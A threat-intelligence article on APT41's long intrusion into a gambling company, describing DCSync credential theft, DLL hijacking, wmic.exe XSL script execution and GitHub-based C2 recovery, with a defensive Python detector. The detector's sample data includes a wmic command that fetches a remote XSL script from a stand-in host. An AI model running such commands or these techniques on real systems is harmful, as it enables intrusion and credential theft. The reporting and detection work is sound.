Introduction
APT41, also known as Brass Typhoon, Wicked Panda, or Winnti, is a well-known Chinese nation-state actor responsible for various cyber espionage campaigns. Recently, APT41 was linked to a highly sophisticated cyber attack on the gambling and gaming industry. The attack showcased the group’s advanced capabilities in infiltrating systems, evading detection, and adapting to the security measures of the targeted companies.
Targeted Attack on the Gambling Sector
APT41 conducted a stealthy cyber attack that persisted for nearly nine months, primarily targeting the gambling and gaming sectors. According to Ido Naor, co-founder and CEO of Security Joes, the attackers were able to gather valuable information, including network configurations, user passwords, and sensitive data from the LSASS process. Throughout the attack, the threat actors consistently updated their tools in response to the defense mechanisms employed by the company’s security team, ensuring their persistent access to the compromised network.
This cyber attack shares similarities with an intrusion known as Operation Crimson Palace, which has been tracked by cybersecurity vendor Sophos.
Adaptive Tactics and Tools
What sets this attack apart is APT41’s methodical approach and ability to evolve. The group continuously updated its tools based on the defense tactics they observed. By gathering insights from the security team’s responses, the attackers adjusted their strategies to evade detection. They utilized a custom toolset designed to bypass installed security software, while harvesting critical information and establishing covert communication channels for remote access.
APT41’s operation is believed to be financially motivated, with Naor stating that the attackers were likely after financial gain. The campaign displayed a level of sophistication rarely seen, blending espionage with financially driven intrusions, including ransomware attacks and cryptocurrency mining.
Exploiting Credentials and Escalating Privileges
Once APT41 infiltrated the targeted company’s infrastructure, they launched a DCSync attack, aiming to steal password hashes of service and admin accounts. By acquiring these credentials, they gained control over the network, focusing on administrative and developer accounts to maintain their foothold. During this phase, the attackers conducted reconnaissance and escalated their privileges, ultimately executing additional payloads to deepen their control over the compromised systems.
Several techniques were employed, including Phantom DLL Hijacking and abusing the legitimate Windows utility wmic.exe to execute malicious code. The attackers exploited their access to administrator accounts, triggering malicious actions through service accounts with elevated privileges.
Malicious Payload Deployment and Command-and-Control
One key element of the attack involved deploying a malicious DLL file named TSVIPSrv.dll, which was retrieved via the SMB protocol. This payload enabled contact with a hard-coded command-and-control (C2) server. In cases where the C2 server failed, the malware adapted by updating its C2 information using a novel method that involved scraping GitHub to locate new C2 servers.
The malware’s creative use of GitHub allowed it to search for sequences of capitalized words, extracting an encoded IP address that directed the new C2 connection. Once connected, the system would be profiled, and more malware would be fetched and executed through socket connections.
Obfuscated JavaScript Code and Targeted Machines
After their activities were detected, APT41 briefly went silent, but eventually returned with a revamped approach. The group employed heavily obfuscated JavaScript code embedded in a modified XSL file. Using the legitimate tool wmic.exe, they triggered the execution of this malicious script, which acted as a downloader for further payloads.
A key aspect of this phase was the deliberate targeting of specific machines within the VPN subnet, identified by IP addresses containing the substring "10.20.22." This selective targeting highlights the attackers’ precision, as they aimed to impact only valuable devices within the company’s network.
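Two of the behaviours described above, the DCSync credential theft and wmic.exe executing a script through an XSL stylesheet, leave characteristic traces in standard Windows telemetry. The following detection sketch is an added example written for this article, not code from Security Joes or any vendor; it runs over constructed Sysmon process-creation (ID 1) and Security 4662 events, and the hostnames, account names and URL are made up. It assumes that only domain controller machine accounts (ending in `$`) are permitted to request replication.

```python
import re

# Control-access-right GUIDs that a DCSync replication request needs; they show
# up in the Properties field of Windows Security event 4662.
DCSYNC_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
# wmic.exe rendering its output through an XSL stylesheet (local .xsl or a URL)
# is the execution path the article describes for the obfuscated JavaScript.
WMIC_XSL = re.compile(r"\bwmic(?:\.exe)?\b.*/format\s*:\s*[\"']?(?:https?://|\S*\.xsl)", re.I)

def is_wmic_xsl_exec(command_line: str) -> bool:
    return bool(WMIC_XSL.search(command_line))

def is_dcsync(event: dict) -> bool:
    """4662 requesting replication rights from a non-DC account looks like DCSync."""
    if event.get("event_id") != 4662:
        return False
    rights = {g.lower() for g in event.get("properties", [])}
    # Domain controllers replicate with each other legitimately; their machine
    # accounts end in '$'. Assumption: nothing else in this domain may replicate.
    return bool(rights & DCSYNC_RIGHTS) and not event.get("subject", "").endswith("$")

def scan(events: list) -> list:
    """Return one alert string per suspicious event, in input order."""
    alerts = []
    for e in events:
        if e.get("event_id") == 1 and is_wmic_xsl_exec(e.get("command_line", "")):
            alerts.append(f"wmic-xsl-exec host={e['host']} cmd={e['command_line']}")
        elif is_dcsync(e):
            alerts.append(f"dcsync host={e['host']} subject={e['subject']}")
    return alerts

# Constructed sample telemetry: two Sysmon process-creation events (ID 1) and
# two Security 4662 events. Hosts, accounts and the URL are made up.
SAMPLE_EVENTS = [
    {"event_id": 1, "host": "ws-10-20-22-14",
     "command_line": 'wmic.exe os get /format:"http://203.0.113.9/style.xsl"'},
    {"event_id": 1, "host": "ws-10-20-22-15", "command_line": "wmic.exe process list brief"},
    {"event_id": 4662, "host": "dc01", "subject": "svc-backup",
     "properties": ["1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"event_id": 4662, "host": "dc01", "subject": "DC02$",
     "properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"]},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Benign wmic.exe usage and ordinary DC-to-DC replication pass through untouched, so the two alerts raised on the sample data are the XSL download on the VPN-subnet host and the replication request from a service account.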
Conclusion
APT41’s attack on the gambling and gaming industry showcases the evolving nature of state-sponsored cyber threats. With a sophisticated approach that involved gathering credentials, evading detection, and using custom tools, the attackers demonstrated their ability to maintain long-term access to the compromised network. The incident underscores the importance of proactive cybersecurity measures, especially in sectors vulnerable to such high-level attacks. The persistence and adaptability of APT41 signal the growing challenges organizations face in defending against nation-state actors.